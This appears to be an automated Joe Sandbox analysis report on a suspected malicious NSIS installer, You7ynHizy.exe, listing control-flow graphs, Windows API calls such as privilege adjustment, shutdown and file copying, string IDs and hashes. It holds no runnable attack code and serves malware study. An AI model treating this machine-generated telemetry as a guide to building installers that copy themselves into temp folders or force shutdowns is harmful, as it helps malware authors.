4516->4517 4518 4062b9 17 API calls 4517->4518 4519 401e39 CreateFontIndirectW 4518->4519 4520 402592 4519->4520 4521 40283b 4522 402843 4521->4522 4523 402847 FindNextFileW 4522->4523 4526 402859 4522->4526 4524 4028a0 4523->4524 4523->4526 4527 406297 lstrcpynW 4524->4527 4527->4526 3843 40543e 3844 4055e8 3843->3844 3845 40545f GetDlgItem GetDlgItem GetDlgItem 3843->3845 3847 4055f1 GetDlgItem CreateThread CloseHandle 3844->3847 3848 405619 3844->3848 3888 404243 SendMessageW 3845->3888 3847->3848 3891 4053d2 5 API calls 3847->3891 3849 405630 ShowWindow ShowWindow 3848->3849 3850 405669 3848->3850 3851 405644 3848->3851 3890 404243 SendMessageW 3849->3890 3857 404275 8 API calls 3850->3857 3852 4056a4 3851->3852 3855 405658 3851->3855 3856 40567e ShowWindow 3851->3856 3852->3850 3859 4056b2 SendMessageW 3852->3859 3853 4054cf 3858 4054d6 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3853->3858 3860 4041e7 SendMessageW 3855->3860 3862 405690 3856->3862 3863 40569e 3856->3863 3861 405677 3857->3861 3864 405544 3858->3864 3865 405528 SendMessageW SendMessageW 3858->3865 3859->3861 3866 4056cb CreatePopupMenu 3859->3866 3860->3850 3869 4052ff 24 API calls 3862->3869 3870 4041e7 SendMessageW 3863->3870 3867 405557 3864->3867 3868 405549 SendMessageW 3864->3868 3865->3864 3871 4062b9 17 API calls 3866->3871 3872 40420e 18 API calls 3867->3872 3868->3867 3869->3863 3870->3852 3873 4056db AppendMenuW 3871->3873 3874 405567 3872->3874 3875 4056f8 GetWindowRect 3873->3875 3876 40570b TrackPopupMenu 3873->3876 3877 405570 ShowWindow 3874->3877 3878 4055a4 GetDlgItem SendMessageW 3874->3878 3875->3876 3876->3861 3879 405726 3876->3879 3880 405593 3877->3880 3881 405586 ShowWindow 3877->3881 3878->3861 3882 4055cb SendMessageW SendMessageW 3878->3882 3883 405742 SendMessageW 3879->3883 3889 404243 SendMessageW 3880->3889 3881->3880 3882->3861 3883->3883 3884 40575f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3883->3884 3886 405784 SendMessageW 3884->3886 3886->3886 3887 4057ad GlobalUnlock SetClipboardData CloseClipboard 3886->3887 3887->3861 3888->3853 3889->3878 3890->3851

                                                                                            Executed Functions

                                                                                            Function 0040336C Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 410stringfilecomCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 0 40336c-4033a9 SetErrorMode GetVersion 1 4033ab-4033b3 call 406671 0->1 2 4033bc 0->2 1->2 7 4033b5 1->7 4 4033c1-4033d5 call 406601 lstrlenA 2->4 9 4033d7-4033f3 call 406671 * 3 4->9 7->2 16 403404-403463 #17 OleInitialize SHGetFileInfoW call 406297 GetCommandLineW call 406297 9->16 17 4033f5-4033fb 9->17 24 403465-40346c 16->24 25 40346d-403487 call 405b99 CharNextW 16->25 17->16 21 4033fd 17->21 21->16 24->25 28 40348d-403493 25->28 29 40359e-4035b8 GetTempPathW call 40333b 25->29 31 403495-40349a 28->31 32 40349c-4034a0 28->32 38 403610-40362a DeleteFileW call 402edd 29->38 39 4035ba-4035d8 GetWindowsDirectoryW lstrcatW call 40333b 29->39 31->31 31->32 33 4034a2-4034a6 32->33 34 4034a7-4034ab 32->34 33->34 36 4034b1-4034b7 34->36 37 40356a-403577 call 405b99 34->37 41 4034d2-40350b 36->41 42 4034b9-4034c1 36->42 52 403579-40357a 37->52 53 40357b-403581 37->53 54 403630-403636 38->54 55 4036db-4036eb call 4038ad OleUninitialize 38->55 39->38 58 4035da-40360a GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40333b 39->58 48 403528-403562 41->48 49 40350d-403512 41->49 46 4034c3-4034c6 42->46 47 4034c8 42->47 46->41 46->47 47->41 48->37 57 403564-403568 48->57 49->48 56 403514-40351c 49->56 52->53 53->28 59 403587 53->59 60 4036cb-4036d2 call 403987 54->60 61 40363c-403647 call 405b99 54->61 75 403811-403817 55->75 76 4036f1-403701 call 4058fd ExitProcess 55->76 63 403523 56->63 64 40351e-403521 56->64 57->37 65 403589-403597 call 406297 57->65 58->38 58->55 67 40359c 59->67 74 4036d7 60->74 77 403695-40369f 61->77 78 403649-40367e 61->78 63->48 64->48 64->63 65->67 67->29 74->55 80 403895-40389d 75->80 81 403819-40382f GetCurrentProcess OpenProcessToken 75->81 87 4036a1-4036af call 405c74 77->87 88 403707-40371b call 405868 lstrcatW 77->88 84 403680-403684 78->84 85 4038a3-4038a7 ExitProcess 80->85 86 40389f 80->86 82 403831-40385f LookupPrivilegeValueW AdjustTokenPrivileges 81->82 83 403865-403873 call 406671 81->83 82->83 101 403881-40388c ExitWindowsEx 83->101 102 403875-40387f 83->102 91 403686-40368b 84->91 92 40368d-403691 84->92 86->85 87->55 103 4036b1-4036c7 call 406297 * 2 87->103 99 403728-403742 lstrcatW lstrcmpiW 88->99 100 40371d-403723 lstrcatW 88->100 91->92 96 403693 91->96 92->84 92->96 96->77 99->55 105 403744-403747 99->105 100->99 101->80 106 40388e-403890 call 40140b 101->106 102->101 102->106 103->60 108 403750 call 40584b 105->108 109 403749-40374e call 4057ce 105->109 106->80 117 403755-403763 SetCurrentDirectoryW 108->117 109->117 118 403770-403799 call 406297 117->118 119 403765-40376b call 406297 117->119 123 40379e-4037ba call 4062b9 DeleteFileW 118->123 119->118 126 4037fb-403803 123->126 127 4037bc-4037cc CopyFileW 123->127 126->123 129 403805-40380c call 40605d 126->129 127->126 128 4037ce-4037ee call 40605d call 4062b9 call 405880 127->128 128->126 138 4037f0-4037f7 CloseHandle 128->138 129->55 138->126
                                                                                            APIs
                                                                                            • SetErrorMode.KERNELBASE ref: 0040338F
                                                                                            • GetVersion.KERNEL32 ref: 00403395
                                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033C8
                                                                                            • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403405
                                                                                            • OleInitialize.OLE32(00000000), ref: 0040340C
                                                                                            • SHGetFileInfoW.SHELL32(0079FEE0,00000000,?,000002B4,00000000), ref: 00403428
                                                                                            • GetCommandLineW.KERNEL32(007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 0040343D
                                                                                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\You7ynHizy.exe",00000020,"C:\Users\user\Desktop\You7ynHizy.exe",00000000,?,00000006,00000008,0000000A), ref: 00403475
                                                                                              • Part of subcall function 00406671: GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
                                                                                              • Part of subcall function 00406671: GetProcAddress.KERNEL32(00000000,?), ref: 0040669E
                                                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035AF
                                                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035C0
                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035CC
                                                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035E0
                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035E8
                                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035F9
                                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403601
                                                                                            • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403615
                                                                                              • Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4
                                                                                            • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036E0
                                                                                            • ExitProcess.KERNEL32 ref: 00403701
                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\You7ynHizy.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403714
                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\You7ynHizy.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403723
                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\You7ynHizy.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040372E
                                                                                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\You7ynHizy.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040373A
                                                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403756
                                                                                            • DeleteFileW.KERNEL32(0079F6E0,0079F6E0,?,007A9000,00000008,?,00000006,00000008,0000000A), ref: 004037B0
                                                                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\You7ynHizy.exe,0079F6E0,00000001,?,00000006,00000008,0000000A), ref: 004037C4
                                                                                            • CloseHandle.KERNEL32(00000000,0079F6E0,0079F6E0,?,0079F6E0,00000000,?,00000006,00000008,0000000A), ref: 004037F1
                                                                                            • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403820
                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403827
                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040383C
                                                                                            • AdjustTokenPrivileges.ADVAPI32 ref: 0040385F
                                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403884
                                                                                            • ExitProcess.KERNEL32 ref: 004038A7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                            • String ID: "C:\Users\user\Desktop\You7ynHizy.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen$C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen$C:\Users\user\Desktop$C:\Users\user\Desktop\You7ynHizy.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                            • API String ID: 3441113951-3297939638
                                                                                            • Opcode ID: 9d8f68ffad0294d88a57d06caf52fd5e4d58377833c7f28028a7ac4efefba988
                                                                                            • Instruction ID: 91e47d7dade8a9784fbcad93861d46a8301334ec9f5f2e607ded2091cc9dec5c
                                                                                            • Opcode Fuzzy Hash: 9d8f68ffad0294d88a57d06caf52fd5e4d58377833c7f28028a7ac4efefba988
                                                                                            • Instruction Fuzzy Hash: 04D12671600300ABD720BF719D45B2B3AACEB8174AF00887FF981B62D1DB7D8955876E
                                                                                            Function 0040543E Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 139 40543e-405459 140 4055e8-4055ef 139->140 141 40545f-405526 GetDlgItem * 3 call 404243 call 404b9c GetClientRect GetSystemMetrics SendMessageW * 2 139->141 143 4055f1-405613 GetDlgItem CreateThread CloseHandle 140->143 144 405619-405626 140->144 164 405544-405547 141->164 165 405528-405542 SendMessageW * 2 141->165 143->144 146 405644-40564e 144->146 147 405628-40562e 144->147 150 405650-405656 146->150 151 4056a4-4056a8 146->151 148 405630-40563f ShowWindow * 2 call 404243 147->148 149 405669-405672 call 404275 147->149 148->146 161 405677-40567b 149->161 154 405658-405664 call 4041e7 150->154 155 40567e-40568e ShowWindow 150->155 151->149 158 4056aa-4056b0 151->158 154->149 162 405690-405699 call 4052ff 155->162 163 40569e-40569f call 4041e7 155->163 158->149 159 4056b2-4056c5 SendMessageW 158->159 166 4057c7-4057c9 159->166 167 4056cb-4056f6 CreatePopupMenu call 4062b9 AppendMenuW 159->167 162->163 163->151 168 405557-40556e call 40420e 164->168 169 405549-405555 SendMessageW 164->169 165->164 166->161 176 4056f8-405708 GetWindowRect 167->176 177 40570b-405720 TrackPopupMenu 167->177 178 405570-405584 ShowWindow 168->178 179 4055a4-4055c5 GetDlgItem SendMessageW 168->179 169->168 176->177 177->166 180 405726-40573d 177->180 181 405593 178->181 182 405586-405591 ShowWindow 178->182 179->166 183 4055cb-4055e3 SendMessageW * 2 179->183 184 405742-40575d SendMessageW 180->184 185 405599-40559f call 404243 181->185 182->185 183->166 184->184 186 40575f-405782 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 184->186 185->179 188 405784-4057ab SendMessageW 186->188 188->188 189 4057ad-4057c1 GlobalUnlock SetClipboardData CloseClipboard 188->189 189->166
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,00000403), ref: 0040549C
                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004054AB
                                                                                            • GetClientRect.USER32(?,?), ref: 004054E8
                                                                                            • GetSystemMetrics.USER32(00000002), ref: 004054EF
                                                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405510
                                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405521
                                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405534
                                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405542
                                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405555
                                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405577
                                                                                            • ShowWindow.USER32(?,00000008), ref: 0040558B
                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004055AC
                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055BC
                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055D5
                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055E1
                                                                                            • GetDlgItem.USER32(?,000003F8), ref: 004054BA
                                                                                              • Part of subcall function 00404243: SendMessageW.USER32(00000028,?,00000001,0040406E), ref: 00404251
                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004055FE
                                                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_000053D2,00000000), ref: 0040560C
                                                                                            • CloseHandle.KERNELBASE(00000000), ref: 00405613
                                                                                            • ShowWindow.USER32(00000000), ref: 00405637
                                                                                            • ShowWindow.USER32(?,00000008), ref: 0040563C
                                                                                            • ShowWindow.USER32(00000008), ref: 00405686
                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056BA
                                                                                            • CreatePopupMenu.USER32 ref: 004056CB
                                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056DF
                                                                                            • GetWindowRect.USER32(?,?), ref: 004056FF
                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405718
                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405750
                                                                                            • OpenClipboard.USER32(00000000), ref: 00405760
                                                                                            • EmptyClipboard.USER32 ref: 00405766
                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405772
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0040577C
                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405790
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 004057B0
                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 004057BB
                                                                                            • CloseClipboard.USER32 ref: 004057C1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                            • String ID: {
                                                                                            • API String ID: 590372296-366298937
                                                                                            • Opcode ID: 113d712a5db4ed50a1b1b5b673bec4020998c06132e16f1965ea7ae8cf20c9d1
                                                                                            • Instruction ID: e2c232b37aba284685acfefcf9c5e68312cc9a4ea8bcb72f9f75ba3fcde89da4
                                                                                            • Opcode Fuzzy Hash: 113d712a5db4ed50a1b1b5b673bec4020998c06132e16f1965ea7ae8cf20c9d1
                                                                                            • Instruction Fuzzy Hash: 0EB15871900608FFDB119FA0DD89EAE7B79FB48354F00812AFA44BA1A0CB795E51DF58
                                                                                            Function 004059A9 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 499 4059a9-4059cf call 405c74 502 4059d1-4059e3 DeleteFileW 499->502 503 4059e8-4059ef 499->503 506 405b65-405b69 502->506 504 4059f1-4059f3 503->504 505 405a02-405a12 call 406297 503->505 507 405b13-405b18 504->507 508 4059f9-4059fc 504->508 512 405a21-405a22 call 405bb8 505->512 513 405a14-405a1f lstrcatW 505->513 507->506 511 405b1a-405b1d 507->511 508->505 508->507 514 405b27-405b2f call 4065da 511->514 515 405b1f-405b25 511->515 516 405a27-405a2b 512->516 513->516 514->506 523 405b31-405b45 call 405b6c call 405961 514->523 515->506 519 405a37-405a3d lstrcatW 516->519 520 405a2d-405a35 516->520 522 405a42-405a5e lstrlenW FindFirstFileW 519->522 520->519 520->522 524 405a64-405a6c 522->524 525 405b08-405b0c 522->525 539 405b47-405b4a 523->539 540 405b5d-405b60 call 4052ff 523->540 528 405a8c-405aa0 call 406297 524->528 529 405a6e-405a76 524->529 525->507 527 405b0e 525->527 527->507 541 405aa2-405aaa 528->541 542 405ab7-405ac2 call 405961 528->542 533 405a78-405a80 529->533 534 405aeb-405afb FindNextFileW 529->534 533->528 538 405a82-405a8a 533->538 534->524 537 405b01-405b02 FindClose 534->537 537->525 538->528 538->534 539->515 543 405b4c-405b5b call 4052ff call 40605d 539->543 540->506 541->534 544 405aac-405ab5 call 4059a9 541->544 552 405ae3-405ae6 call 4052ff 542->552 553 405ac4-405ac7 542->553 543->506 544->534 552->534 556 405ac9-405ad9 call 4052ff call 40605d 553->556 557 405adb-405ae1 553->557 556->534 557->534
                                                                                            APIs
                                                                                            • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76233420,00000000), ref: 004059D2
                                                                                            • lstrcatW.KERNEL32(007A3F28,\*.*,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,76233420,00000000), ref: 00405A1A
                                                                                            • lstrcatW.KERNEL32(?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,76233420,00000000), ref: 00405A3D
                                                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,76233420,00000000), ref: 00405A43
                                                                                            • FindFirstFileW.KERNEL32(007A3F28,?,?,?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,76233420,00000000), ref: 00405A53
                                                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AF3
                                                                                            • FindClose.KERNEL32(00000000), ref: 00405B02
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                            • String ID: "C:\Users\user\Desktop\You7ynHizy.exe"$(?z$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                            • API String ID: 2035342205-2816165867
                                                                                            • Opcode ID: 4d5656c0894c7074968c07a7ddfc43275556ff456bdda599b280e6413b0d544d
                                                                                            • Instruction ID: 8b5db7531a0f4bb83586dba503ceccc8cbbd7972abfd892cd346515476ce1415
                                                                                            • Opcode Fuzzy Hash: 4d5656c0894c7074968c07a7ddfc43275556ff456bdda599b280e6413b0d544d
                                                                                            • Instruction Fuzzy Hash: 7D41D830900918A6CF21AB65CC89ABF7678EF82718F14827FF801B11C1D77C5985DE6E
                                                                                            Function 004065DA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14fileCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 725 4065da-4065ee FindFirstFileW 726 4065f0-4065f9 FindClose 725->726 727 4065fb 725->727 728 4065fd-4065fe 726->728 727->728
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNELBASE(?,007A4F70,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,00405CBD,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,?,?,76233420,004059C9,?,C:\Users\user\AppData\Local\Temp\,76233420), ref: 004065E5
                                                                                            • FindClose.KERNEL32(00000000), ref: 004065F1
                                                                                            Strings
                                                                                            • pOz, xrefs: 004065DB
                                                                                            • C:\Users\user\AppData\Local\Temp\nsu4899.tmp, xrefs: 004065DA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
